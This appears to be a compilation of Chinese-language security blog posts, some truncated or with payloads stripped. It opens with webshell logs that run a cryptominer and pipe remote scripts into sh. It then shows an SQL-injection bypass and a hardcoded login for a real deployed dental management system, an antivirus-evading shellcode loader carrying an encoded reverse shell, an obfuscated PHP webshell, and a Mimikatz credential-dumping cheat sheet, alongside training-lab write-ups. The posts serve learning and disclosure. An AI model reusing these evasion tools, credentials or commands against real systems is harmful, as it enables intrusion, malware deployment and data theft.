54.36.49.151 - - [04/Feb/2022:02:25:00 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)"
54.36.49.151 - - [04/Feb/2022:02:25:20 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+xmr64%3B+.%2Fxmr64+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36"
54.36.49.151 - - [04/Feb/2022:02:25:20 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 524 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.1 Safari/535.1"
54.36.49.151 - - [04/Feb/2022:02:25:20 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+pty3%3B+.%2Fpty3+%26 HTTP/1.1" 200 455 "-" "Mozilla/5.0 (X11; CrOS i686 12.433.216) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.105 Safari/534.30"
54.36.49.151 - - [04/Feb/2022:02:25:20 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=wget+-qO+-+http%3A%2F%2F34.66.229.152%2F.b%2F1sh+%7C+sh HTTP/1.1" 200 432 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729; .NET4.0E)"
54.36.49.151 - - [04/Feb/2022:02:25:21 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=curl+http%3A%2F%2F34.66.229.152%2F.b%2F3sh+%7C+sh HTTP/1.1" 200 517 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16"

可以確定總共有兩個 IP 使用過這個 WebShell ，分別是 54.36.49.151 跟 162.55.76.218。

用 SQL injection 撿到 40+ 台機器跟幾千人個資的小故事

Tue, 01 Mar 2022 15:20:00 +0800

HITCON 0 Day: https://zeroday.hitcon.org/vulnerability/ZD-2021-00767

有點忘記起因了，有一天我在 Shodan 上面亂逛時，發現到了一批在台灣的電腦，都開啟了 8081 的 Web Port，它們的 Banner 都寫了 “樂晴牙醫管理系統”

因為我有在瀏覽器安裝 DotGit ，一點進去之後就叫了，這個網站的目錄底下存在著 .git 因此可以使用 GitHack 之類的東西進行還原。

跑下去之後偷偷看了一下程式碼，一看不得了，竟然有兩個可以任意登入的方法？！

漏洞 1

在程式碼的主要登入邏輯中 ajax/checkLogin_ajax.php 可以看到

$sql="select sfsn,sfno,sfpasswd,position,isowner,sfname from staff where sfno='$id' and sfpasswd='$password' ";

這是一個超級超級裸的 SQL injection ，使用所謂的 SQL injection 萬用密碼就可以進行登入了 QQ。

帳號 : ' or 1=1 --
密碼 : 任意字串

漏洞 2 (Feature?

繼續的看同一個檔案，會發現在原始碼中留了一個寫死的預設密碼

if ($id!='' && $password!=''){
 if ($id=='leyan' && $password=='0429'){
 $has=1;
 session_start();
 $_SESSION['staffid']="leyan";
 $_SESSION['staffpw']="0429";
 $_SESSION['staffposition']='S';
 $_SESSION['isManager']='1';
 $_SESSION['staffname']='Leyan';
 $_SESSION['staffsfsn']=0;

因此只需要透過帳號 leyan 以及密碼 0429 就能登入所有的系統

Meow Ware Loader - A Windows Shellcode Loader with Meow meow

Mon, 28 Feb 2022 13:02:57 +0800

一款會把 Shell Code 給轉成 meow meow 的 Shell Code 載入器。程式碼使用方式等請參考下方 GitHub 連結。

GitHub : https://github.com/stevenyu113228/Meow-Ware-Loader

現在，有許多的防毒軟體都會透過惡意程式碼的特徵 (例如 YARA RULE) 來進行捕捉，因此部分惡意程式會透過 Shell Code 形式，在執行時間再注入到記憶體中，透過這種方式來規避查緝。

不過現在也有許多防毒軟體開始支援掃描非執行檔的 Shell Code 程式，因此可以透過把 Shell Code 進行編碼，以規避查緝，並透過 Loader 來進行載入執行。

其實這個構想是我前天晚上睡到一半想到的，剛好想到說 Encode 通常大家都愛用什麼 Base64、ROT13 這類現有的編碼方式，而防毒軟體在已知的狀況下很有可能也可以進行自動解碼，因此我想到了自創的 Meow Encode 法。

Meow Encode Method

我們知道 Meow 總共有 4 個英文字母，而如果考量到小大寫的話，總共有 2^4 = 16 種組合。我們也可以直接把大小寫當作二進位來看，小寫是 0 、大寫是 1。因此對照表如下

MeowBinaryDecimalHexadecimalmeow000000meoW000111meOw001022meOW001133mEow010044mEoW010155mEOw011066mEOW011177Meow100088MeoW100199MeOw101010aMeOW101111bMEow110012cMEoW110113dMEOw111014eMEOW111115f

因此，編碼後的 Shell Code 會長的類似這個樣子，下面為 msfvenom 的 shell_reverse_tcp 範例

MEOWMEowMEOwMeowMeowmeOwmeowmeowmeowmeowmeowmeowmEOwmeowMeowMeoWMEOwmEoWmeOWmeoWMEowmeowmEOwmEowMeowMeOWmEoWmeowmeOWmeowMeowMeOWmEoWmeOwmeowMEowMeowMeOWmEoWmeOwmeoWmEowMeowMeOWmEOWmeOwmeOwMeowmeowMEOWMeOWmEOWmEowMeOwmeOwmEOwmeOWmeoWMEOWMEOWMeOwMEowmeOWMEowmEOwmeoWmEOWMEowmeowmeOwmeOwMEowmeOwmeowMEowmeoWMEowMEOWmeowMEoWmeowmeoWMEowmEOWMEOwmeOwMEOWmeOwmEoWmeOwmEoWmEOWMeowMeOWmEoWmeOwmeoWmeowMeowMeOWmEowMeOwmeOWMEowMeowMeOWmEowMEowmeoWmeoWmEOWMeowMEOwmeOWmEowMeowmeowmeoWMEoWmeoWmEoWmeoWMeowMeOWmEoWMeoWmeOwmeowmeowmeoWMEoWmeOWMeowMeOWmEowMeoWmeoWMeowMEOwmeOWmeOWMeOwmEowMeoWMeowMeOWmeOWmEowMeowMeOWmeowmeoWMEoWmEOwmeOWmeoWMEOWMEOWMeOwMEowMEowmeoWMEowMEOWmeowMEoWmeowmeoWMEowmEOWmeOWMeowMEOwmeowmEOWmEoWMEOWmEOwmeowmeOWmEOWMEoWMEOWMeowmeOWMeOWmEOWMEoWmeOwmEowmEOWmEoWMEOwmEowmEoWMeowMeowMeOWmEoWMeowmeOwmEowmeowmeoWMEoWmeOWmEOwmEOwMeowMeOWmeowMEowmEowMeOWMeowMeOWmEoWMeowmeoWMEowmeowmeoWMEoWmeOWMeowMeOWmeowmEowMeowMeOWmeowmeoWMEoWmeowMeowMeoWmEowmEowmeOwmEowmeOwmEowmEoWMeOWmEoWMeOWmEOwmeoWmEoWMeoWmEoWMeOwmEoWmeoWMEOWMEOWMEOwmeowmEoWMEOWmEoWMEOWmEoWMeOwMeowMeOWmeoWmeOwMEOwMeOWMeowMEoWmEoWMEoWmEOwMeowmeOWmeOWmeOWmeOwmeowmeowmeowmeowmEOwMeowmEOWmEOWmEOWmeOWmeOWmeOwmEoWMEOWmEoWmEowmEOwMeowmEowMEowmEOWmEOWmeOwmEOwmeowmEOWMEOWMEOWMEoWmEoWMeOWMeowMeoWmeowmeowmeoWmeowmeowmeowmeowmeOwMeoWMEowmEowmEoWmEowmEoWmeowmEOwMeowmeOwMeoWMeowmeowmEOwMeOWmeowmeowMEOWMEOWMEoWmEoWmEoWmeowmEoWmeowmEoWmeowmEoWmeowmEowmeowmEoWmeowmEowmeowmEoWmeowmEOwMeowMEOwMeOwmeowMEOWMEoWMEOWMEOwmeowMEOWMEOWMEoWmEoWMeoWmEOWmEOwMeOwmeowmEoWmEOwMeowMEowmeowMeOwMeowmeOwMeowMeowmeoWmEOwMeowmeowmeOwmeowmeowmeOwmEowMEOwMEoWMeowMeoWMEOwmEOwmEOwMeOwmeoWmeowmEoWmEOwmEoWmEOWmEOwMeowMeoWMeoWMeOwmEoWmEOWmEowmEOwmeoWMEOWMEOWMEoWmEoWMeowmEoWMEowmeowmEOWmEowmeowMEowMEOWMEOWmEowMEOwmeowMeowmEOWmEoWMEOwMEowmEOwMeowMEOWmeowMeOWmEoWMeOwmeOwmEoWmEOwMEOWMEOWMEoWmEoWmEOwMeowmEOwmeOWmEOwMEoWmEOwmEowmeowmeowMeowMeoWMEOwmeOWmEoWmEOWmEoWmEOWmEoWmEOWmeOWmeoWMEOWmEOwmEOwMeOwmeoWmeOwmEoWMeoWmEoWmEOwMEOwmeOwMEOWMEoWmEOwmEOwMEowmEOWmEowmEowmeOwmEowmeOWMEowmeowmeoWmeowmeoWMeowMEoWmEowmEowmeOwmEowmeoWmeowMEowmEOwmeowmeowmEowmEowmEoWmEowmEoWmeowmEoWmEOwmEoWmEOwmEoWmEOwmEowmEOwmEoWmEOwmEowMEOwmEoWmEOwmEoWmEOwmEoWmeOWmEoWmEOwmEOwMeowmEOWMeoWMEowMEowmeOWMEOWMeowmEOwMEOWMEOWMEoWmEoWMeowMeoWMEOwmeowmEowMEOwmEoWmEOwmEowmEOwMEOWMEOWmeOWmeowmEOwMeowmeowMeowMeowmEOWmeoWMEoWmEOwmeowMEOWMEOWMEoWmEoWMeOWMeOWMEOWmeowMeOWmEoWMeOwmeOwmEoWmEOwmEOwMeowMeOwmEOwMeoWmEoWMeOWMEoWMeoWMEoWMEOWMEOWMEoWmEoWmeOWMEowmeowmEOwmEOWMEowmeowMeOwMeowmeowMEOWMeOWMEOwmeowmEOWmEoWmeowmEoWMeOWMeOWmEowmEOWmeoWmeOWmEOWmeOwmEOwMEOWmEOwMeOwmeowmeowmEoWmeOWMEOWMEOWMEoWm

Shell Code Loader

void *exec = VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
memcpy(exec, shellcode, memory_allocation);

VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
(*(void (*)()) exec)();

這邊我參考抄了 DimopoulosElias 大大寫的 SimpleShellcodeInjector 程式碼，其中重點是下面這幾行

Cross-site scripting (XSS) (PortSwigger Writeup)

Sat, 26 Feb 2022 22:55:19 +0800

我覺得 XSS 的題目都有一點通，還有一點無聊 QQ

Lab: Reflected XSS into HTML context with nothing encoded

題目敘述

This lab contains a simple reflected cross-site scripting vulnerability in the search functionality.

To solve the lab, perform a cross-site scripting attack that calls the alert function.

題目解釋

在搜尋功能的反射性 XSS

解答

在搜尋上面打

alert(1)

Lab: Stored XSS into HTML context with nothing encoded

題目敘述

This lab contains a stored cross-site scripting vulnerability in the comment functionality.

To solve this lab, submit a comment that calls the alert function when the blog post is viewed.

OSCP ㄉ一些心路歷程

Tue, 22 Feb 2022 22:41:57 +0800

距離考過 OSCP 已經 2 個月了，終於比較空下來可以寫一下關於心得的文章~~，再不寫也要開始忘ㄌ~~，最近時常也有許多的朋友們來問一些準備訣竅等等的問題，為了避免常常被私訊問 + 回答一樣的問題，所以打算來寫一篇文，~~之後遇到一樣或類似的問題就直接貼這篇給他們看就好~~。

報名前的準備

在考 OSCP 前，我有一定的 Web CTF 經驗，但其實我的 Web 技術也不算是太好，大概就 AIS3 Pre-exam 勉強可以進去，或是金盾獎可以吊車尾的得名左右的程度，我覺得單純論 Web 的難度而言，對應上 CTF，這樣的程度就已經綽綽有餘了。在 OSCP 的考試中，除了 Web 的技術之外，基本上用不到 Reverse 的技術，除了其中一題的 Lab 之外。而 Crypto 的技術基本上也用不到太多，只要會用工具，例如使用 CyberChef 做一些編碼、解碼、加解密就夠了。我覺得打滲透比起 CTF，最大的差異應該是思路，要先試著找出伺服器的特徵，尋找已知的 1-Day，千萬不要埋頭苦幹，100% 自己打洞，現實生活中的滲透也是如此。

之所以會想在這個時間點考 OSCP 主要就是因為在開始寫認真論文前，剛好有一個空檔的感覺，實驗室在做的計劃，學弟妹也都開始可以順利接棒，這段時間剛好可以來學一些有趣的東西。

各種便宜ㄉ練習機

因為 OSCP 的 LAB 跟考試真的貴鬆鬆 QQ，所以滿多人會使用一些第三方的靶機、LAB 來提前作一些練習，我在暑假的兩個月多月中，主要打了一些 Try Hack Me (THM)、 Hack The Box (HTB) 的靶機，其中， THM 約打了三十幾台，感謝飛飛借我付費版的帳號 >序號題目名稱日期備註1Dotty2021-10-09第一台2Alpha2021-10-15LP13Alice2021-10-15LP34Beta2021-10-16LP25Disco2021-10-16LP46Susie2021-10-16LP57Hotline2021-10-16LP68Break2021-10-179Core2021-10-1710Sufferance2021-10-18魔王題11Gh0st2021-10-18小魔王(?12Pain2021-10-19舊魔王13JEFF2021-10-1914Phoenix2021-10-1915Sean2021-10-20LP1016Mailman2021-10-2017ralph2021-10-2118Chris2021-10-21LP719MIKE2021-10-2220Leftturn2021-10-2221Mail2021-10-2422Jd2021-10-2523Bethany2021-10-26LP1124XOR-App592021-10-2625XOR-App232021-10-2726Tophat2021-10-2727SVclient082021-10-2828Humble2021-10-28魔王29Timeclock2021-10-3030Kraken2021-10-3031FC42021-10-3032DJ2021-10-31331nsider2021-10-3134Gamma2021-11-0135Bruce2021-11-0236Bob2021-11-0237Shared2021-11-13IT38Freddy2021-11-13IT39Chimera2021-11-14IT40Mvua0072021-11-14IT41Thelongnight2021-11-15IT42Tablemanners2021-11-15IT43Luigi2021-11-16Admin44Mario2021-11-16Admin45Jack2021-11-17Admin46Tricia2021-11-17Admin47Harry2021-11-17Admin48Ekzameno2021-11-17Admin49Kaitlyn2021-11-18Admin50Manager2021-11-18Dev51John2021-11-18Dev52Adam2021-11-18Dev533141592652021-11-1954Defender2021-11-1955Cory2021-11-1956Master2021-11-1957Nina2021-11-20IT58Carrie2021-11-20IT59Nicky2021-11-21IT60Brett2021-11-21IT61James2021-11-21Dev62Carol2021-11-21Dev63Peter2021-11-2164Pedro2021-11-2265Maria2021-11-2466SV-File012021-11-2567SVClient732021-11-2568SV-DC012021-11-2569XOR-App072021-11-2570XOR-DC012021-11-2571Ajla2021-12-1Sandbox72Zora2021-12-1Sandbox73Poultry2021-12-1Sandbox74Cevapi2021-12-1Sandbox75SandboxDC2021-12-1Sandbox

預約考試

很快的，時間就到了快要考試的時候，真心建議大家要在考試前至少兩周，或更早就申請考試時間，我在 Lab 快要結束的時候 (11月底)，報名了考試，當時就只能預約到 1 月初的考試時間，因此我就預約了 1/12 的考試。

Wordle Spoiler Bot

Wed, 16 Feb 2022 20:39:00 +0800

GitHub : https://github.com/stevenyu113228/Wordle-Spoiler-Bot

感覺 Wordle 也紅一陣子了，但我覺得最近的題目都好難，都解不出來 QQ，一氣之下就寫了一個 Telegram 的腳本來自動地告訴我當天的答案。

原始碼分析

觀察 https://www.nytimes.com/games/wordle/index.html 首頁的原始碼，可以看到一個重點的 JavaScript，main.bfba912f.js (後面的 Hash 可能會變)

按下去後會取得一大串壓縮後的 JS，可以先把它送到 JS Beautifier 上面，就能看到大量的解答ㄌ，題目是每天照順序取一個出來。

理論上我們可以把這個 List 取出來之後，透過計算 Offset 的方法就能取得當天以及未來的答案。

但這樣的問題是，如果 Wordle 未來修改了原始碼，可能就會預測失敗 QQ。

因此我的解法是大致的看完原始碼後，發現他會呼叫一個 Class 跟他的 Function

new wordle.bundle.GameApp()

這個產出的 Object 中，有一個屬性叫做 solution 即為答案。

所以我們可以在 F12 中輸入下列指令取得答案

(new wordle.bundle.GameApp()).solution

接下來再把這個功能給用 Selenium 包起來，透過 Selenium 可以執行 js 的特性來取得答案

driver.execute_script("return (new wordle.bundle.GameApp()).solution")

最後調整時區、套上 Telegram 的 API 、包成 Docker 就大功告成了！

簡單 PHP Webshell 免殺

Tue, 15 Feb 2022 14:31:48 +0800

原本想隨便寫一個 Webshell 測試使用，但一下就被 Defender 吃掉了

 "str_ro"
// "str_ro"."t13" => "str_rot13"
// ("system")(("str_rot13")($e)) => system(str_rot13($e))
// system(str_rot13($e)) => system("curl malicious.com/a.sh | sh")

在 VirusTotal 上竟然 All pass ㄏ

PHP Linux Extensions Hello World

Mon, 14 Feb 2022 22:34:56 +0800

要做這個主要是碩論的研究跟 RASP 有一點點關係，而 PHP RASP 需要透過 PHP Extenstions 來進行編譯以及使用，所以本文主要會記錄一些基本的 PHP Extenstions 的撰寫以及開發方式。

本文會需要使用到的環境

任意 Linux 或 WSL 搭配 Docker
Docker Ubuntu 20.04
PHP 7.3.33 Source Code

環境建置

在安裝好 Ddocer 後，理論上一鍵就可以建置好乾淨的 Ubuntu 20.04 docker，理論上-v 的部分可以自己修改掛載點

sudo docker run -it -v /home/steven/compile-rasp/mount_point:/mount_point ubuntu:20.04

接下來可以安裝一些之後可能會用到的小工具

apt update
apt install wget unzip software-properties-common -y
apt-add-repository ppa:ondrej/php
apt install php7.3-dev -y

途中 software-properties-common 的安裝過程可能會跳出一些東西，就照著回答就好了。

接下來下載 php 相關的程式碼

cd mount_point
wget https://www.php.net/distributions/php-7.3.33.tar.gz
tar zxvf php-7.3.33.tar.gz
chmod -R 777 * # 因為我在 Docker 外使用 Mount，這樣處理權限比較簡單

建立第一個 Extension

要寫 Extenstion，第一件事情是需要先建立一個 Extension，在原始碼路徑中 php-7.3.33/ext 中，有一個名為 ext_skel.php 的檔案，skel 是 skeleton (骨架) 的縮寫，也就是讓我們建立一個軀殼。

Server-side request forgery (SSRF) (PortSwigger Writeup)

Mon, 14 Feb 2022 19:30:00 +0800

Lab: Basic SSRF against the local server

題目敘述

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

題目解釋

任意發 HTTP GET Request

解答

觀察 Stock check 的 API 發現他會去戳

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

改送

http%3a%2f%2flocalhost%2fadmin

發現就能看到 admin 介面

再送

http%3A%2F%2Flocalhost%2Fadmin%2Fdelete%3Fusername%3Dcarlos

Lab: Basic SSRF against another back-end system

題目敘述

This lab has a stock check feature which fetches data from an internal system.

第一篇貓咪🐱

Sat, 12 Feb 2022 23:04:38 +0800

這是我ㄉ第一篇貓咪🐱

主要會在這邊貼一些自己的筆記或是一些亂七八糟ㄉ東西

然後近期可能會補上一些以前存在其他地方的文

為了避免混亂，發文日期會設定成比較早ㄉ時間

就醬喵ㄅㄅ

Business logic vulnerabilities (PortSwigger Writeup)

Fri, 11 Feb 2022 19:30:00 +0800

Lab: Excessive trust in client-side controls

題目敘述

This lab doesn’t adequately validate user input. You can exploit a logic flaw in its purchasing workflow to buy items for an unintended price. To solve the lab, buy a “Lightweight l33t leather jacket”.

You can log in to your own account using the following credentials: wiener:peter

題目解釋

竄改 POST 內容

解答

在加入購物車時會順便 POST 價格

POST /cart HTTP/1.1
Host: acd31fa31fe0b3dcc04314f500560069.web-security-academy.net
Cookie: session=IxPR6nrwBtk0VSUHVKPDmBuwG2IJVK8z
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: https://acd31fa31fe0b3dcc04314f500560069.web-security-academy.net
Referer: https://acd31fa31fe0b3dcc04314f500560069.web-security-academy.net/product?productId=1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Te: trailers
Connection: close

productId=1&redir=PRODUCT&quantity=1&price=133700

竄改成 1 再去購物車結帳就好ㄌ

WebSockets (PortSwigger Writeup)

Tue, 08 Feb 2022 19:29:00 +0800

Lab: Manipulating WebSocket messages to exploit vulnerabilities

題目敘述

This online shop has a live chat feature implemented using WebSockets.

Chat messages that you submit are viewed by a support agent in real time.

To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent’s browser.

題目解釋

練習用 Burp 抓 Websockets

解答

用 Burp 抓包後，上面有一個 Websockets history

把資料丟到 Repeater 之後改輸入

{"user":"You","content":" "}

Lab: Manipulating the WebSocket handshake to exploit vulnerabilities

題目敘述

This online shop has a live chat feature implemented using WebSockets.

Access control vulnerabilities (PortSwigger Writeup)

Mon, 07 Feb 2022 19:28:00 +0800

Lab: Unprotected admin functionality

題目敘述

This lab has an unprotected admin panel.
Solve the lab by deleting the user carlos.

題目解釋

沒有限制的 admin 面板

解答

從 robots.txt 可以看到 /administrator-panel，進去刪帳號

Lab: Unprotected admin functionality with unpredictable URL

題目敘述

This lab has an unprotected admin panel. It’s located at an unpredictable location, but the location is disclosed somewhere in the application.

Solve the lab by accessing the admin panel, and using it to delete the user carlos.

Server-side template injection (PortSwigger Writeup)

Sun, 06 Feb 2022 19:28:08 +0800

Lab: Basic server-side template injection

題目敘述

This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.

To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory.

題目解釋

題目說是 ERB 的 SSTI

解答

https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/
?message=

會回傳 49

https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/
?message=

可以取得使用者名稱

https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/
?message=

順利刪除檔案

Lab: Basic server-side template injection (code context)

題目敘述

This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory.

Information disclosure (PortSwigger Writeup)

Sat, 05 Feb 2022 19:27:00 +0800

Lab: Information disclosure in error messages

題目敘述

This lab’s verbose error messages reveal that it is using a vulnerable version of a third-party framework. To solve the lab, obtain and submit the version number of this framework.

題目解釋

想辦法讓他噴 Error 可能可以洩漏版本號

解答

https://acf81fed1ef0e1cbc040196e00b300c0.web-security-academy.net/product?productId=asd

就會噴出 Apache Struts 2 2.3.31

Lab: Information disclosure on debug page

題目敘述

This lab contains a debug page that discloses sensitive information about the application. To solve the lab, obtain and submit the SECRET_KEY environment variable.

File upload vulnerabilities (PortSwigger Writeup)

Sat, 05 Feb 2022 19:26:00 +0800

Lab: Remote code execution via web shell upload

題目敘述

This lab contains a vulnerable image upload function. It doesn’t perform any validation on the files users upload before storing them on the server’s filesystem.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Directory traversal (PortSwigger Writeup)

Sat, 05 Feb 2022 19:24:00 +0800

Lab: File path traversal, simple case

題目敘述

This lab contains a file path traversal vulnerability in the display of product images.

To solve the lab, retrieve the contents of the /etc/passwd file.

題目解釋

圖片網址的地方可以任意讀檔，嘗試讀取 /etc/passwd。

解答

觀察一個圖片

https://ac801f311fe78ab8c0bf223f000500bf.web-security-academy.net/image?filename=11.jpg

修改 Filename

https://ac801f311fe78ab8c0bf223f000500bf.web-security-academy.net/image?filename=../../../../../../../etc/passwd

Lab: File path traversal, traversal sequences blocked with absolute path bypass

題目敘述

This lab contains a file path traversal vulnerability in the display of product images.

The application blocks traversal sequences but treats the supplied filename as being relative to a default working directory.

OS command injection (PortSwigger Writeup)

Sat, 05 Feb 2022 19:24:00 +0800

Lab: OS command injection, simple case

題目敘述

This lab contains an OS command injection vulnerability in the product stock checker.

The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.

To solve the lab, execute the whoami command to determine the name of the current user.

題目解釋

要執行 whoami，弱點在 stock checker

解答

Post 設定參數

productId=1%20%26%26%20whoami&storeId=3

題目敘述

This lab contains a blind OS command injection vulnerability in the feedback function.

SQL injection (PortSwigger Writeup)

Sat, 05 Feb 2022 19:20:00 +0800

Lab: SQL injection UNION attack, determining the number of columns returned by the query

題目敘述

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
To solve the lab, determine the number of columns returned by the query by performing an SQL injection UNION attack that returns an additional row containing null values.

Meterpreter 基礎

Sun, 26 Dec 2021 23:27:00 +0800

產 Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={PORT} -f exe -e x86/shikata_ga_nai > {FILE}

執行

記得 Payload 需要修改成相對應的windows/meterpreter/reverse_tcp

常見指令

ls,pwd , mkdir, catBJ4getuid-
取得使用者名稱edit {檔名}- 會直接開啟 vim 可以改檔案sysinfo- 系統資訊getsystem- 如果有過 UAC 的話，有機率可以直接拿 system
執行後輸入 getuid 就可以確認自己是否真的是 system 了ps``migrate {PID}- 可以讓自己爬到 x64 之類的 system 權限上
例如 lsass.exe 的 PIDscreenshot- 截圖
需要是當前使用者，不能是 system 之類upload {檔案} / download {檔案}- upload -> attacker to victim
download -> victim to attacker

Mimikatz

需要是 system 權限
load kiwi
help kiwi
lsa_dump_sam取 Hashlsa_dump_secrets- 取明文密碼kiwi_cmd sekurlsa::logonpasswords- 需要先 migrate 到 x64 上

Solar, exploiting log4j (Try Hack Me Writeup)

Sun, 19 Dec 2021 13:03:00 +0800

https://tryhackme.com/room/solar

2021 / 12 / 9 公開了 CVE-2021-44228，影響到了 log4j，它的危害程度達到 10，這個漏洞又被稱作 Log4Shell
現在已經有新版的 2.16.0 Release 了，不過又出現了 Log4j2

Recon

透過掃 Port 可以看到有開 3 個 Port，分別是22,111,8983

rustscan -a 10.10.18.186 -r 1-65535

可以用 nmap 做更詳細的掃瞄

nmap -sV -Pn -A -p22,111,8983 10.10.18.186

可以發現 8983 開的是一個 Apache solr 的 Server

Discovery

觀察首頁的版本可以知道他是 Solr 8.11.0

觀察 -Dsolr.log.dir 可以看到他的 log Path 是 /var/solr/logs

下載 lab 提供的 solrlogs.zip 檔案，他是一份範例的 Log 檔案

可以觀察到裡面有一個叫做 solr.log 的檔案會紀錄網頁的 Path 相關 Log

DEVCORE WarGame (Web) for HITCON 2021 Writeup

Mon, 29 Nov 2021 13:42:00 +0800

DEVCORE WarGame (Web) for HITCON 2021 Writeup

By Steven Meow

URL : https://wargame.devcore.tw/Web : http://web.ctf.devcore.tw/今年與去年一樣，在 HITCON 會場上有 DEVCORE 的擺攤，解 Wargame 就可以換小獎品與 NFT，而且據說今年的題目都是來自現實生活中的真實案例改編，我覺得題目比起去年明顯的簡單了不少。但我還是覺得在 HITCON 辦這種活動不太優 QQ 會害人無法專心聽議程，都在解題。畢竟這種 Conf，我覺得聽議程還是比較重要 Q__Q。

弱點 01 Path Traversal

簡單逛一下網頁會發現是一個印表機的訂購網站觀察進入網頁首頁的 HTTP Request 可以看到一個明顯可疑的 URL- http://web.ctf.devcore.tw/image.php?id=aHBfbTI4M2Zkdy5qcGc=
根據一點點的小直覺，可以猜出 ID 的參數是透過 Base64 編碼的 (因為結尾有出現=)- 解碼後可以看出是圖片的檔名而直接訪問則會出現印表機的圖片- 我們可以合理的猜測這可能有一個任意讀檔，或是 LFI 的漏洞，前提是需要把路徑轉 Base64 再放入 ID- 首先測試 /etc/passwd
透過 echo -n '../../../../../../../etc/passwd' | base64 -w0
可以取得 Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
再把 Base64 的結果串上網址的 ID，用 curl 送 request
發現可以順利取得 /etc/passwd
而且告訴了我們 Flag 在 php 原始碼裡面至此，可以非常合理的確認我們可以讀檔了我們也可以把指令寫的更直觀一點- curl http://web.ctf.devcore.tw/image.php?id=$(echo -n '../../../../../../../etc/passwd' | base64 -w0)
未來只需要修改路徑就可以快速發送 Requests尋找網頁根目錄- 通常，預設的網頁根目錄會放在 /var/www/html但這個網站看起來有刻意的設計過，所以檔案目標不在這邊
在現代，為了方便，大多數的服務都會透過 Docker 來進行部屬 (特別是 CTF 題目，被打爛了可以快速砍掉重架)，而 Docker 通常會透過 Mount 目錄等方法，使 Docker 內外互通- 我們可以透過 /proc/1/mountinfo 或是 /proc/self/mounts 看到一些掛載的資訊
從上面的一堆垃圾可以確認我們真的在 docker 裡面
另外我們可以注意到下面有一些有趣的東西
/usr/share/nginx/images
/usr/share/nginx/b8ck3nd
/usr/share/nginx/frontend
我們可以合理懷疑原始碼就藏在這幾個路徑裡面取得原始碼- 前端首頁 (後面只寫路徑)curl http://web.ctf.devcore.tw/image.php?id=$(echo -n '../../../../../../../usr/share/nginx/frontend/index.php' | base64 -w0)可以發現裡面有 require_once('include.php');前端 include- /usr/share/nginx/frontend/include.php
就順利取得 Flag 1 了前端 image- /usr/share/nginx/frontend/image.php
可以發現它只是 Base64 解開丟 readfile($file);，所以沒有 LFI ，只能任意讀檔官方報告

-

弱點 02：Broken Access Control

開始玩一下網頁的功能立刻訂購index.php
訂購成功- submit.php
訂單資訊- order.php?id=35163&sig=PFRo8eZYWmnXmM4UJfApOvPZlnBtQoIsoRejgCzlIe5fkPu8FnxhYmD56zlSblHY
雖然我們看到了一些參數，但不需要急著 SQL injection，因為我們可以透過第一個漏洞來讀原始碼，確認有沒有漏洞查看收據- receipt.php?id=35163&sig=PFRo8eZYWmnXmM4UJfApOvPZlnBtQoIsoRejgCzlIe5fkPu8FnxhYmD56zlSblHY
列印- 按下去後會出現一個匯出 PDF 的頁面
